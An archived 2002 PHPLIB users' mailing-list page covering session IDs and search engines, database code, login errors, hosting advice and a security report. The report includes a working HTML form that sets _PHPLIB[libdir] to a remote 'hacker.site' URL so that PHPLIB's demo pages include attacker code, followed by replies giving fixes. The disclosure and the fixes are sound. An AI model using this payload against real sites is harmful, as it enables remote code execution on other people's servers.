phplib-users Mailing List for PHPLIB (Page 72)
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
phplib-users — A list for users of phplib to talk / discuss phplib
You can subscribe to this list here.
| 2001 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
(106) |
Sep
(99) |
Oct
(44) |
Nov
(97) |
Dec
(60) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2002 |
Jan
(56) |
Feb
(81) |
Mar
(134) |
Apr
(69) |
May
(106) |
Jun
(122) |
Jul
(98) |
Aug
(52) |
Sep
(184) |
Oct
(219) |
Nov
(102) |
Dec
(106) |
| 2003 |
Jan
(88) |
Feb
(37) |
Mar
(46) |
Apr
(51) |
May
(30) |
Jun
(17) |
Jul
(45) |
Aug
(19) |
Sep
(5) |
Oct
(4) |
Nov
(12) |
Dec
(7) |
| 2004 |
Jan
(11) |
Feb
(7) |
Mar
|
Apr
(15) |
May
(17) |
Jun
(13) |
Jul
(5) |
Aug
|
Sep
(8) |
Oct
(6) |
Nov
(21) |
Dec
(13) |
| 2005 |
Jan
(4) |
Feb
(3) |
Mar
(7) |
Apr
(7) |
May
|
Jun
(11) |
Jul
(7) |
Aug
|
Sep
|
Oct
|
Nov
(7) |
Dec
|
| 2006 |
Jan
(3) |
Feb
|
Mar
(1) |
Apr
|
May
|
Jun
(2) |
Jul
(1) |
Aug
|
Sep
|
Oct
(9) |
Nov
|
Dec
(5) |
| 2007 |
Jan
(15) |
Feb
(2) |
Mar
|
Apr
|
May
|
Jun
|
Jul
(9) |
Aug
|
Sep
(2) |
Oct
|
Nov
|
Dec
|
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
(12) |
May
|
Jun
(3) |
Jul
(1) |
Aug
(19) |
Sep
(2) |
Oct
|
Nov
|
Dec
(6) |
| 2009 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(6) |
|
From: Sascha W. <sas...@gm...> - 2002-03-08 12:39:49
|
Hi Martin, >Just a quick thought. No search-engine that I know of will ever make a >POST but just follow links, so maybe it is possible for you to have >the user to post a (empty) form to get into to "search-engine-locked" >part of the site? I'm not sure if I understood you right, but there's no "search-engine-locked" part. The whole site SHALL BE INDEXED but WITHOUT SESSIONIDs. I think the problem is at the point where the phplib-pagemanagement sends a HTTP-"Location:"-header with a sessionid in the url to the client if there isn't already one in cookie or url!! That means, even if a robot requests an url WITHOUT sessionid, an url WITH sessionid will be indexed if the pagemanagement isn't disabled for robots. Or am I wrong? greets, Sascha. |
|
From: Sascha W. <sas...@gm...> - 2002-03-08 12:06:14
|
At 11:30 07.03.2002 -0600, you wrote: >One thing I've found is that some search engines _won't_ go into pages for >which there's session data passed back to the client. As long as that doesn't apply for all search-engines you can't really deal with it. I've read about guys having big problems with a sessionid indexed on ALTAVISTA and all user coming from there having the same shopping_cart. >This doesn't answer your question, nor I'm sure is it encouraging news w. >regard to getting your product catalog indexed, but I thought I'd pass it >on. Thank you sincerely for your effort anyway, Sascha. >Thus spake Sascha Weise on Thu, Mar 07, 2002 at 10:58:37AM CST > > Hi out there, > > > > I'm coding a shop with the help of phplib (thanks a lot to all the > > developers at this point). > > One purpose is, that every page with products-infos can be indexed by > > search-engines to make the rare products more findable - so I can't lock > > all pages for robots. > > > > At this point I was pretty astonished, that I found no > standard-solution to > > prevent urls with session-id's to be indexed by robots! > > > > All hints I found (most in the archive of this list) recommended to check > > $HTTP_USER_AGENT against a list of known user-agents and then not to start > > phplib-page-management-functions if a robot was identified. > > For me this seems not to be very usable as I think it's hard to > maintain an > > actual list of ALL relevant search-engines. > > > > > > Now my questions: > > > > - Does anyone know a better (perfect and simple) solution for this problem? > > > > OR > > > > - Wouldn't it be more simple and effective to check $HTTP_USER_AGENT > > against some valid user-agent-strings from browsers? > > (At least every browser does have something like "...compatible; MSIE..." > > in his string and I guess this list is shorter and easyier to maintain > as a > > list of robots) > > Does anyone know some PROs and CONs for this assumption? > > > > > > Thanks in advance, > > > > Sascha. > > > > > > _______________________________________________ > > Phplib-users mailing list > > Php...@li... > > https://lists.sourceforge.net/lists/listinfo/phplib-users > >-- >Lindsay Haisley | "Everything works | PGP public key >FMP Computer Services | if you let it" | available at >512-259-1190 | (The Roadie) | <http://www.fmp.com/pubkeys> >http://www.fmp.com | | > >_______________________________________________ >Phplib-users mailing list >Php...@li... >https://lists.sourceforge.net/lists/listinfo/phplib-users |
|
From: Sascha W. <sas...@gm...> - 2002-03-08 11:00:11
|
Hi Steve, >One problem I have noticed by watching my logs is that a lot of robots >masquerade as browsers How did you find out? >So the question becomes can you make a list of robots that you care >about knowing that you will never catch all of them anyway because >some don't play fair. Right, those who don't play fair can't be considered anyway. But don't you think, it's easier to make a list of ca. 5 browsers than a list of an unknown amount of robots I (should) care about? thanks for your answer, Sascha. |
|
From: Martin L. <mar...@ma...> - 2002-03-08 06:54:07
|
Hello Sascha, Thursday, March 07, 2002, 5:58:37 PM, you wrote: SW> At this point I was pretty astonished, that I found no standard-solution to SW> prevent urls with session-id's to be indexed by robots! SW> - Does anyone know a better (perfect and simple) solution for this problem? Just a quick thought. No search-engine that I know of will ever make a POST but just follow links, so maybe it is possible for you to have the user to post a (empty) form to get into to "search-engine-locked" part of the site? This might be a little dirty workaround, but depending on your project it might be the easiest solution. -- Martin mailto:mar...@ma... Mail me for my public PGP-key |
|
From: Lindsay H. <fm...@fm...> - 2002-03-07 17:30:51
|
One thing I've found is that some search engines _won't_ go into pages for which there's session data passed back to the client. I'm not sure if the rejection is on account of GET data or attempts to set cookies, or both. To get at least the top page of such sites indexed, I generally take a snapshot of the top page and serve it as a straight HTML. The site doesn't try to establish a session until a visitor goes to satellite pages. This doesn't answer your question, nor I'm sure is it encouraging news w. regard to getting your product catalog indexed, but I thought I'd pass it on. Thus spake Sascha Weise on Thu, Mar 07, 2002 at 10:58:37AM CST > Hi out there, > > I'm coding a shop with the help of phplib (thanks a lot to all the > developers at this point). > One purpose is, that every page with products-infos can be indexed by > search-engines to make the rare products more findable - so I can't lock > all pages for robots. > > At this point I was pretty astonished, that I found no standard-solution to > prevent urls with session-id's to be indexed by robots! > > All hints I found (most in the archive of this list) recommended to check > $HTTP_USER_AGENT against a list of known user-agents and then not to start > phplib-page-management-functions if a robot was identified. > For me this seems not to be very usable as I think it's hard to maintain an > actual list of ALL relevant search-engines. > > > Now my questions: > > - Does anyone know a better (perfect and simple) solution for this problem? > > OR > > - Wouldn't it be more simple and effective to check $HTTP_USER_AGENT > against some valid user-agent-strings from browsers? > (At least every browser does have something like "...compatible; MSIE..." > in his string and I guess this list is shorter and easyier to maintain as a > list of robots) > Does anyone know some PROs and CONs for this assumption? > > > Thanks in advance, > > Sascha. > > > _______________________________________________ > Phplib-users mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phplib-users -- Lindsay Haisley | "Everything works | PGP public key FMP Computer Services | if you let it" | available at 512-259-1190 | (The Roadie) | <http://www.fmp.com/pubkeys> http://www.fmp.com | | |
|
From: Sascha W. <sas...@gm...> - 2002-03-07 16:41:30
|
Hi out there, I'm coding a shop with the help of phplib (thanks a lot to all the developers at this point). One purpose is, that every page with products-infos can be indexed by search-engines to make the rare products more findable - so I can't lock all pages for robots. At this point I was pretty astonished, that I found no standard-solution to prevent urls with session-id's to be indexed by robots! All hints I found (most in the archive of this list) recommended to check $HTTP_USER_AGENT against a list of known user-agents and then not to start phplib-page-management-functions if a robot was identified. For me this seems not to be very usable as I think it's hard to maintain an actual list of ALL relevant search-engines. Now my questions: - Does anyone know a better (perfect and simple) solution for this problem? OR - Wouldn't it be more simple and effective to check $HTTP_USER_AGENT against some valid user-agent-strings from browsers? (At least every browser does have something like "...compatible; MSIE..." in his string and I guess this list is shorter and easyier to maintain as a list of robots) Does anyone know some PROs and CONs for this assumption? Thanks in advance, Sascha. |
|
From: Joe S. <jo...@be...> - 2002-03-07 14:47:29
|
On Thu, Mar 07, 2002 at 01:59:21PM +0000, Matt Williams wrote:
> Hi all
>
> I'm writing a search class that I can get to search which ever table I tell
> it to.
>
> at the moment I am I am using this code
>
> while($db->next_record())
> {
> $array[] = array("name"=>$db->f("name"),"location"=$db->f("location"));
> }
>
> the problem is how can I do the same thing without knowing in advance the
> column names returned from the database.
>
> so the index is the column name and the value is the column entry for that
> particular row.
>
This should work OK, shouldn't it?
$array[] = $db->Record;
Joe
|
|
From: Matt W. <li...@ye...> - 2002-03-07 14:01:37
|
Hi all
I'm writing a search class that I can get to search which ever table I tell
it to.
at the moment I am I am using this code
while($db->next_record())
{
$array[] = array("name"=>$db->f("name"),"location"=$db->f("location"));
}
the problem is how can I do the same thing without knowing in advance the
column names returned from the database.
so the index is the column name and the value is the column entry for that
particular row.
while($row = mysql_fetch_row()) {
$myArray[$row[0]] = $row[1];
}
There's a an entry in the contributed notes for the php manual that says the
above will do this.
How could I do it with PHPLib.
TIA
matt
|
|
From: Brett D. <br...@cl...> - 2002-03-05 16:28:07
|
Frank, Please re-read the one line I left quoted from my original email. Brett At 9:50 AM -0500 3/5/02, Frank Bax wrote: >Could this be a pg config problem? What does your postgresql >startup script look like? Did you add "-i"? > >Frank > >At 02:20 AM 05/03/02 -0500, Brett Dikeman wrote: >>the session data showed up in the table, etc. -- ---- "They that give up essential liberty to obtain temporary safety deserve neither liberty nor safety." - Ben Franklin http://www.users.cloud9.net/~brett/ |
|
From: Frank B. <fb...@sy...> - 2002-03-05 14:51:26
|
Could this be a pg config problem? What does your postgresql startup
script look like? Did you add "-i"?
Frank
At 02:20 AM 05/03/02 -0500, Brett Dikeman wrote:
>I just installed both the latest PHP and phplib(7.2d) versions. I'm using
>a very recent version of PostgreSQL.
>
>I FINALLY managed to get it all to work, or so I thought.
>
>The index file was working great, jumping up by 1 every reload; the
>session data showed up in the table, etc.
>
>So I try showoff.php3.
>
>I enter the user/pass "kris"/"test"...and get...absolutely nothing.
>
>I just get returned right back to the login page, with not even a "no such
>user" message. The user/password combo exist both in the regular and md5
>auth sections.
>
>This is what happens when I load index.php3:
>
>[Tue Mar 5 02:09:37 2002] [error] PHP Warning: Undefined property: Port
>in /var/www/php/db_pgsql.inc on line 45
>
>(it appears to load just fine)
>
>then, when I load showoff:
>
>[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined property: Port
>in /var/www/php/db_pgsql.inc on line 45
>[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined property: in in
>/var/www/php/auth.inc on line 52
>[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined index: uid in
>/var/www/php/auth.inc on line 235
>
>
>line #45 of db_pgsql.inc the line about Port/port=
>
> function connect() {
> if ( 0 == $this->Link_ID ) {
> $cstr = "dbname=".$this->Database.
> $this->ifadd($this->Host, "host=").
> $this->ifadd($this->Port, "port=").
> $this->ifadd($this->User, "user=").
> $this->ifadd($this->Password, "password=");
> $this->Link_ID=pg_pconnect($cstr);
> if (!$this->Link_ID) {
> $this->halt("Link-ID == false, pconnect failed");
> }
>
>
>Line 52 of auth.inc is the first non-comment line here. It is pretty much
>the first thing in function start().
>
> ## This is for performance, I guess but I'm not sure if it could
> ## be safely removed -- negro
> if (! $this->in) {
> $sess->register("auth");
> $this->in = true;
> }
>
>
>
>Line #235 of auth.inc is the third line here:
>
> function is_authenticated() {
> if (
> $this->auth["uid"]
> &&
> (($this->lifetime <= 0) || (time() < $this->auth["exp"]))
> ) {
>
>
>I was able to eliminate the port errors by adding:
> var $Port = "5432";
>
>after $host in class DB_Example in local.inc; the errors about line 52 in
>auth.inc went away after I uncommented the whole if statement, but logins
>still won't work.
>
>Brett
>PS:the install docs on the website list the wrong address info for the
>mailing list.
>--
>
>
>_______________________________________________
>Phplib-users mailing list
>Php...@li...
>https://lists.sourceforge.net/lists/listinfo/phplib-users
|
|
From: Brett D. <br...@cl...> - 2002-03-05 07:20:37
|
I just installed both the latest PHP and phplib(7.2d) versions. I'm
using a very recent version of PostgreSQL.
I FINALLY managed to get it all to work, or so I thought.
The index file was working great, jumping up by 1 every reload; the
session data showed up in the table, etc.
So I try showoff.php3.
I enter the user/pass "kris"/"test"...and get...absolutely nothing.
I just get returned right back to the login page, with not even a "no
such user" message. The user/password combo exist both in the
regular and md5 auth sections.
This is what happens when I load index.php3:
[Tue Mar 5 02:09:37 2002] [error] PHP Warning: Undefined property:
Port in /var/www/php/db_pgsql.inc on line 45
(it appears to load just fine)
then, when I load showoff:
[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined property:
Port in /var/www/php/db_pgsql.inc on line 45
[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined property:
in in /var/www/php/auth.inc on line 52
[Tue Mar 5 02:09:45 2002] [error] PHP Warning: Undefined index:
uid in /var/www/php/auth.inc on line 235
line #45 of db_pgsql.inc the line about Port/port=
function connect() {
if ( 0 == $this->Link_ID ) {
$cstr = "dbname=".$this->Database.
$this->ifadd($this->Host, "host=").
$this->ifadd($this->Port, "port=").
$this->ifadd($this->User, "user=").
$this->ifadd($this->Password, "password=");
$this->Link_ID=pg_pconnect($cstr);
if (!$this->Link_ID) {
$this->halt("Link-ID == false, pconnect failed");
}
Line 52 of auth.inc is the first non-comment line here. It is pretty
much the first thing in function start().
## This is for performance, I guess but I'm not sure if it could
## be safely removed -- negro
if (! $this->in) {
$sess->register("auth");
$this->in = true;
}
Line #235 of auth.inc is the third line here:
function is_authenticated() {
if (
$this->auth["uid"]
&&
(($this->lifetime <= 0) || (time() < $this->auth["exp"]))
) {
I was able to eliminate the port errors by adding:
var $Port = "5432";
after $host in class DB_Example in local.inc; the errors about line
52 in auth.inc went away after I uncommented the whole if statement,
but logins still won't work.
Brett
PS:the install docs on the website list the wrong address info for
the mailing list.
--
|
|
From: Richard A. <rh...@ju...> - 2002-03-02 23:55:39
|
This is not a security flaw in PHPLIB. There was once a problem with _PHPLIB handling, but that was fixed back in July 2001 with the release of 7.2d. The "test cases" described are due to a broken installation of PHPLIB, not a flaw in the library. To avoid the possibility of remote code being executed on PHPLIB pages, prepend.php3 must be included at the start of any file which uses PHPLIB. It contains the lines: $_PHPLIB = array(); # Can't control your include path? # Point this to your PHPLIB base directory. Use a trailing "/"! $_PHPLIB["libdir"] = ""; This initialises the include path variable so that it cannot be overridden by crafted form input. ...R. |
|
From: Matt F. <ma...@sp...> - 2002-03-02 23:40:52
|
www.epicworks.com has really done a good job for us. When will these hosting companies learn that poor service causes their customers to look elsewhere? It's not that had to figure out. Matt Friedman Web Applications Developer www.SpryNewMedia.com Email: ma...@Sp... -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of nathan r. hruby Sent: Sunday March 3, 2002 3:00 AM To: Mike Green Cc: php...@li... Subject: Re: [Phplib-users] Web hosting recommendations I have recommended csoft.net before, but since they revoked my account without warning one day and refused to return my emails or listen to me I would suggest staying away from them. csoft sucks. -n ------ nathan hruby na...@ds... ------ On Sat, 2 Mar 2002, Mike Green wrote: > Hi! > > I am looking for a new web hosting service (virtual hosting). > > For three years I have used and been very happy with Adgrafix.com on the > basis of the quick, competent responses they consistently gave. In fact > I recommended them often, perhaps on this list even. Last year, however, > Adgrafix.com was bought out by another concern and has become > Hosting.com. It turns out that Hosting.com's tech support responsiveness > is essentially non-existent. So I am looking for recommendations for a > new hosting service for the several web sites for which I am > responsible. > > My requirements: > > * rapid, competent tech support response, > * reliability (high server up times), > * LAMP (Linux -- or Unix -- Apache, MySQL, and PHP -- and Perl), > * the ability to modify the Apache configuration myself (in order to > modify the PHP configuration -- it would be better still to have access > to the php.ini file in addition to the Apache configuration file), > * email tools like aliasing, list servers, and > * reasonable cost. > > All of these were features on which I could rate Adgrafix.com high -- > although their costs were not the lowest. Hosting.com has lost me now on > the first point -- which in fact impacts the second one. > > TIA for your recommendations. > > Mike Green > > > > > _______________________________________________ > Phplib-users mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phplib-users > _______________________________________________ Phplib-users mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phplib-users |
|
From: nathan r. h. <na...@ds...> - 2002-03-02 21:56:11
|
I have recommended csoft.net before, but since they revoked my account without warning one day and refused to return my emails or listen to me I would suggest staying away from them. csoft sucks. -n ------ nathan hruby na...@ds... ------ On Sat, 2 Mar 2002, Mike Green wrote: > Hi! > > I am looking for a new web hosting service (virtual hosting). > > For three years I have used and been very happy with Adgrafix.com on the > basis of the quick, competent responses they consistently gave. In fact > I recommended them often, perhaps on this list even. Last year, however, > Adgrafix.com was bought out by another concern and has become > Hosting.com. It turns out that Hosting.com's tech support responsiveness > is essentially non-existent. So I am looking for recommendations for a > new hosting service for the several web sites for which I am > responsible. > > My requirements: > > * rapid, competent tech support response, > * reliability (high server up times), > * LAMP (Linux -- or Unix -- Apache, MySQL, and PHP -- and Perl), > * the ability to modify the Apache configuration myself (in order to > modify the PHP configuration -- it would be better still to have access > to the php.ini file in addition to the Apache configuration file), > * email tools like aliasing, list servers, and > * reasonable cost. > > All of these were features on which I could rate Adgrafix.com high -- > although their costs were not the lowest. Hosting.com has lost me now on > the first point -- which in fact impacts the second one. > > TIA for your recommendations. > > Mike Green > > > > > _______________________________________________ > Phplib-users mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phplib-users > |
|
From: Mike G. <Mik...@sa...> - 2002-03-02 21:35:49
|
Hi! I am looking for a new web hosting service (virtual hosting). For three years I have used and been very happy with Adgrafix.com on the basis of the quick, competent responses they consistently gave. In fact I recommended them often, perhaps on this list even. Last year, however, Adgrafix.com was bought out by another concern and has become Hosting.com. It turns out that Hosting.com's tech support responsiveness is essentially non-existent. So I am looking for recommendations for a new hosting service for the several web sites for which I am responsible. My requirements: * rapid, competent tech support response, * reliability (high server up times), * LAMP (Linux -- or Unix -- Apache, MySQL, and PHP -- and Perl), * the ability to modify the Apache configuration myself (in order to modify the PHP configuration -- it would be better still to have access to the php.ini file in addition to the Apache configuration file), * email tools like aliasing, list servers, and * reasonable cost. All of these were features on which I could rate Adgrafix.com high -- although their costs were not the lowest. Hosting.com has lost me now on the first point -- which in fact impacts the second one. TIA for your recommendations. Mike Green |
|
From: Matt F. <ma...@sp...> - 2002-03-02 17:18:47
|
I just simply removed that code from my implementation of phplib - I
never have a need to include files from another server. I'd be surprised
if many apps would use this anyway.=20
Or you could do:
if( isset($_GET['_PHPLIB']) ) die("some message");
-----Original Message-----
From: php...@li...
[mailto:php...@li...] On Behalf Of Marcin
Pyla
Sent: Saturday March 2, 2002 11:51 AM
To: php...@li...
Subject: Re: [Phplib-users] security hole !!!Remote code execution !!!
Hello,
add checking $_PHPLIB["libdir"] before
include($_PHPLIB["libdir"] . "table.inc");
if in $_PHPLIB["libdir"] is string http:// then stop - exit;
It will be probably something like that:
if (preg_match('/^http:\/\//', $_PHPLIB["libdir"])) {
echo "Wrong \$_PHPLIB[\"libdir\"].";
exit;
}
include($_PHPLIB["libdir"] . "table.inc");
>
> files:
> /pages/new_user_alt.php3
> /pages/view_sessions.php3
> /pages/showoff.php3
>
> line:
> include($_PHPLIB["libdir"] . "table.inc");
>
> example:
>
> <form method=3DPOST
action=3D"http://phplib.sourceforge.net/showroom/view_sessions.php3">
> <input type=3Dhidden name=3D"_PHPLIB[libdir]"
value=3D"http://hacker.site/some_path/">
> <input type=3Dsubmit>
>
> versions tested: <7.4-pr1
>
> tested, (and works) on
> http://phplib.sourceforge.net/
Yes, I try and it works.
--=20
Pozdrawiam,
Marcin Pyla
(o_ [ <@ Marcin Pyla - Cubbi <cu...@se...> | <<+ NetArt ISP +>>
@> ]
(/)_ [ Odkryto, =BFe C++ posiada niesamowit=B1 zdolno=B6=E6 do ukrywania
]
[ nieistotnych detali w programach, takich jak bugi.
]
_______________________________________________
Phplib-users mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phplib-users
|
|
From: Marcin P. <cu...@se...> - 2002-03-02 16:50:15
|
Hello,
add checking $_PHPLIB["libdir"] before
include($_PHPLIB["libdir"] . "table.inc");
if in $_PHPLIB["libdir"] is string http:// then stop - exit;
It will be probably something like that:
if (preg_match('/^http:\/\//', $_PHPLIB["libdir"])) {
echo "Wrong \$_PHPLIB[\"libdir\"].";
exit;
}
include($_PHPLIB["libdir"] . "table.inc");
>
> files:
> /pages/new_user_alt.php3
> /pages/view_sessions.php3
> /pages/showoff.php3
>
> line:
> include($_PHPLIB["libdir"] . "table.inc");
>
> example:
>
> <form method=3DPOST action=3D"http://phplib.sourceforge.net/showroom/vi=
ew_sessions.php3">
> <input type=3Dhidden name=3D"_PHPLIB[libdir]" value=3D"http://hacker.si=
te/some_path/">
> <input type=3Dsubmit>
>
> versions tested: <7.4-pr1
>
> tested, (and works) on
> http://phplib.sourceforge.net/
Yes, I try and it works.
--=20
Pozdrawiam,
Marcin Pyla
(o_ [ <@ Marcin Pyla - Cubbi <cu...@se...> | <<+ NetArt ISP +>> @=
> ]
(/)_ [ Odkryto, =BFe C++ posiada niesamowit=B1 zdolno=B6=E6 do ukrywania =
]
[ nieistotnych detali w programach, takich jak bugi. =
]
|
|
From: Pawel L. <paw...@il...> - 2002-03-02 16:02:07
|
files: /pages/new_user_alt.php3 /pages/view_sessions.php3 /pages/showoff.php3 line: include($_PHPLIB["libdir"] . "table.inc"); example: <form method=POST action="http://phplib.sourceforge.net/showroom/view_sessions.php3"> <input type=hidden name="_PHPLIB[libdir]" value="http://hacker.site/some_path/"> <input type=submit> versions tested: <7.4-pr1 tested, (and works) on http://phplib.sourceforge.net/ |
|
From: <gro...@fr...> - 2002-03-01 12:44:36
|
Jepp, phpslash ist a very nice example for my intention, thanks for the tip. But I'am just looking for some Information about dynamic Form-Generation. In my application are a lot of (>15) typical "list, new and view, edit, delete" cases to maintain records (eg customers, employee, article) and it would be the best to have only one script/class/template wich is variable enough to service all table. Some examples for this around??? thx Matthias > On Fri, Mar 01, 2002 at 02:35:41PM +0530, Tarique Sani <ta...@sa...> wrote: > > On Wed, 27 Feb 2002, [iso-8859-1] Matthias Gröschl wrote: > > Hi > > > > I dont know the state of affairs BUT phpslash is one such app > > Nathan comments? > > > > Yes, I had sent Matthias a direct reply offlist. phpSlash 0.65 provides > example of default auth that some people have had problems with lately. > Nathan might chime in with more info. > > Here is part of what I sent Matthias offlist: > > phpSlash 0.65 ( http://www.phpslash.org). > It uses phplib db, templates, session, auth, and perm. > > You can download it here: > > http://sourceforge.net/project/showfiles.php?group_id=10566 > > > Joe > > > _______________________________________________ > Phplib-users mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phplib-users > |
|
From: Joe S. <jo...@be...> - 2002-03-01 12:23:05
|
On Fri, Mar 01, 2002 at 02:35:41PM +0530, Tarique Sani <ta...@sa...> wrote: > On Wed, 27 Feb 2002, [iso-8859-1] Matthias Gröschl wrote: > Hi > > I dont know the state of affairs BUT phpslash is one such app > Nathan comments? > Yes, I had sent Matthias a direct reply offlist. phpSlash 0.65 provides example of default auth that some people have had problems with lately. Nathan might chime in with more info. Here is part of what I sent Matthias offlist: phpSlash 0.65 ( http://www.phpslash.org). It uses phplib db, templates, session, auth, and perm. You can download it here: http://sourceforge.net/project/showfiles.php?group_id=10566 Joe |
|
From: Tarique S. <ta...@sa...> - 2002-03-01 09:22:29
|
On Wed, 27 Feb 2002, [iso-8859-1] Matthias Gr=F6schl wrote: Hi I dont know the state of affairs BUT phpslash is one such app Nathan comments? Tarique > Hi folks, >=20 > I actually made my first steps with phplib. Some benefits are hard to=20 > get for a newbie. Therefore, it would be very useful to have a complete > application as example scripts. To see the different core classes work=20 > together in one application would give me a better overview and hint > full > details for my work. >=20 > Do you have some Information, Links etc for me??? >=20 > Thanks in advance > Matthias >=20 > =20 >=20 >=20 > _______________________________________________ > Phplib-users mailing list > Php...@li... > https://lists.sourceforge.net/lists/listinfo/phplib-users >=20 --=20 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D PHP Applications for E-Biz: http://www.sanisoft.com Indian PHP User Group: http://groups.yahoo.com/group/in-phpug =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D |
|
From: Rogers, P. <Pau...@mo...> - 2002-03-01 09:05:49
|
Dear All
I have an application which uses the template system and an oracle database.
(shown below).
In it's current form it createsa menu based on two tables by retrieving an
id based on a mnemonic for a particular menu. It then uses this to retrieve
the relevent menu items and create page ie.
Menu Title <-- Template
Menu Item 1 <--Sub Template
Menu Item 2
Menu Item 3
....etc
What I now need is to further break this menu down into sub menus ie
Menu Title <-- Template
SubMenu Title1 <-- Sub Template
Menu Item 1 <-- Sub Sub Template
Menu Item 2
SubMenu Title2 <-- Sub Template
Menu Item 3 <-- Sub Sub Template
....etc
I've tried amending the attached script but can't work out how to nest the
three queries. I keep getting a message from Oracle stating the queries
have been accessed in the wrong order. Can someone give me a simple example
of how to nest three queries. I'm guessing I need a sub sub template as
shown above but I can't work out how I nest all these templates/queries.
Many thanks
Paul
<?php //webindex.php
#set any default values
$root = "/qa_dept/";
# This section goes and retrieves the data
# common.inc includes the code for producing arrays from form fields
include ('common.inc');
# Retrieve the values from the array
$div = $arr_request['div'] ;
$index = $arr_request['index'] ;
# Define our Application Type and the vaultstem
$AppType = "index" ;
$VaultStem = "103" ;
# create Template instance called $templ
$templ = new Mowlem_Template("/usr/local/apache/htdocs/templates",
"keep");
# define variables named requests and r_dbout referencing files
$templ->set_file(array(
"webindex" => "web".$AppType.".ihtml",
"sub_webindex" => "sub_web".$AppType.".ihtml"));
//Set up the query string for the map.....
// We're searching for a particular Map
$str_sql = "
select
s.id, m.str_title
from mlm_web_submenu s, mlm_web_menmap m
where s.parent = m.id
and m.str_code = '"
.$index.
"' and m.str_type = '"
.$AppType.
"'"
;
// instantiate new instance of class
$db = new DB_Mowlem;
// Send it the query, and get the data
$db->query("$str_sql");
$db->next_record();
$Index_Id = $db->Record[id];
$Index_Title = $db->Record[str_title];
#Now we need to retreive the entries for the index
$str_sql = "
select mi.str_extref, mi.str_subtype, mi.str_subdoc, pg.latest,
xpr.title, xpr.revn, pr.status
from mlm_web_menu_items mi, xv"
.$VaultStem.
"_pg xpg, v"
.$VaultStem.
"_pg pg, xv"
.$VaultStem.
"_pr xpr, v"
.$VaultStem.
"_pr pr
where mi.str_extref = xpg.extref (+) and
xpg.id = pg.id (+) and
pg.latest = xpr.id (+) and
xpr.id = pr.id (+) and
mi.parent = "
.$Index_Id.
"and mi.str_division like '%"
.$div.
"%'";
// Send the db instance our query, and get the data
$db->query("$str_sql");
# extract the block named "row" from "sub_webmap", creating a
# reference to {rows} in "sub_webmap".
$templ->set_block("sub_webindex", "row", "rows");
while ($db->next_record()) {
$doc = $db->Record[str_extref];
$DocTitle = $db->Record[title];
$subtype = $db->Record[str_subtype];
$subdoc=$db->Record[str_subdoc];
$endLink = " title=\"".$DocTitle."\"
name=\"".$doc."\">".$DocTitle."</a>";
$templ->set_var(array("Reference" => $db->Record[str_extref],
"Revision" => $db->Record[revn]));
# Check what sort of document it is were retrieving and act accordingly
switch ($subtype) {
case "none":
$templ->set_var(array("Doc_Title" => $DocTitle));
break;
case "webpage":
$templ->set_var(array("Doc_Title" => "<a
href=".$root.$subdoc.$endLink));
break;
case "kbank":
$templ->set_var(array("Doc_Title" => "<a
href=http://edmserver:2999/EDM/dosetvault?vaultname=MCE_QA_Control&destinati
on=http://edmserver:2999/EDM/ftr".$endLink));
break;
case "index":
$templ->set_var(array("Doc_Title" => "<a
href=/webindex.php?index=".$subdoc."&div=".$div.$endLink));
break;
case "map":
$templ->set_var(array("Doc_Title" => "<a
href=/webmap.php?map=".$subdoc."&div=".$div.$endLink));
break;
default:
$templ->set_var(array("Doc_Title" => "<a
href=/getdoc.php?vid=".$VaultStem."&prid=".$db->Record[latest].$endLink));
}
# and then parse the whole lot
$templ->parse("rows", "row", true);
};
#This section outputs the data
# define the variables PAGETITLE, NumberType, AppType & HEADER
$templ->set_var(array(
"Division" => $div,
"Index_Title" => $Index_Title));
# build sub_mapOutput from index...
$templ->parse("sub_indexOutput", "sub_webindex");
# build mapsOutput from index...
$templ->parse("indexOutput", "webindex");
# finish all Output and print it.
$templ->p("indexOutput");
?>
*****************************************************************************
This email and any attachments transmitted with it are confidential
and intended solely for the use of the individual or entity to whom
they are addressed. If you have received this email in error please
notify the sender and do not store, copy or disclose the content
to any other person.
It is the responsibility of the recipient to ensure that opening this
message and/or any of its attachments will not adversely affect
its systems. No responsibility is accepted by the Company.
*****************************************************************************
|
|
From: <gro...@fr...> - 2002-02-27 22:56:09
|
Hi folks, I actually made my first steps with phplib. Some benefits are hard to get for a newbie. Therefore, it would be very useful to have a complete application as example scripts. To see the different core classes work together in one application would give me a better overview and hint full details for my work. Do you have some Information, Links etc for me??? Thanks in advance Matthias |
|
From: Darryl M. <dar...@op...> - 2002-02-27 01:19:16
|
Thanks for that example on how to do this. I'll have a look into that th=
is
afternoon but looks promising.
-----Original Message-----
From: php...@li...
[mailto:php...@li...]On Behalf Of Bj=F6rn
Schotte
Sent: Wednesday, 27 February 2002 1:07 AM
To: php...@li...
